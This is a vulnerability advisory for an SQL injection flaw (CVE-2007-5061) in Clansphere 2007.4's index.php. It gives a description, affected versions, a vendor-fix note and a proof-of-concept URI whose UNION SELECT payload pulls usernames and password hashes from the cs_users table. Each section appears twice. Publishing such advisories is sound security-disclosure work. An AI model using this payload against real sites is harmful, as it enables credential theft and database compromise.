Clansphere index.php SQL Injection Vulnerability
BID:25770
Info
Clansphere index.php SQL Injection Vulnerability
| Bugtraq ID: | 25770 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-5061 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 22 2007 12:00AM |
| Updated: | May 07 2015 05:35PM |
| Credit: | R00T[ATI] is credited with the discovery of this vulnerability. |
| Vulnerable: |
Clansphere Clansphere 2007.4 |
| Not Vulnerable: |
Clansphere Clansphere 2007.4.1 |
Discussion
Clansphere index.php SQL Injection Vulnerability
Clansphere is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects Clansphere 2007.4; other versions may also be affected.
Clansphere is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects Clansphere 2007.4; other versions may also be affected.
Exploit / POC
Clansphere index.php SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/index.php?mod=banners&cat_id=-1'%20UNION%20ALL%20SELECT%20null,concat(users_nick,0x3a,users_pwd),null,null%20FROM%20cs_users/*
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/index.php?mod=banners&cat_id=-1'%20UNION%20ALL%20SELECT%20null,concat(users_nick,0x3a,users_pwd),null,null%20FROM%20cs_users/*
Solution / Fix
Clansphere index.php SQL Injection Vulnerability
Solution:
The vendor has released updates to address this issue. Contact the vendor for details on obtaining and applying the appropriate updates.
Solution:
The vendor has released updates to address this issue. Contact the vendor for details on obtaining and applying the appropriate updates.